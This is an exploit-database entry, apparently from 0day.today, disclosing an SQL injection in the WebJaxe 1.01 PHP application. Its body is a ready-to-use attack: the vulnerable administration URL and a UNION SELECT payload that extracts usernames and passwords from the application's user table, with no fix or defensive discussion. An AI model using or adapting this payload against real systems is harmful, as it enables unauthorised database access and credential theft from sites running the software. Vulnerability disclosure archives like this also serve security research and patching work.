WebJaxe Sql Injection Vulnerability

2010-05-18T00:00:00
ID 1337DAY-ID-12280
Type zdt
Reporter IHTeam
Modified 2010-05-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================
WebJaxe Sql Injection Vulnerability
===================================


###############################################################################
#
# Exploit Title: WebJaxe Sql Injection
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###############################################################################
 
!You need a registred user!
 
http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]
 
Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs



#  0day.today [2018-01-08]  #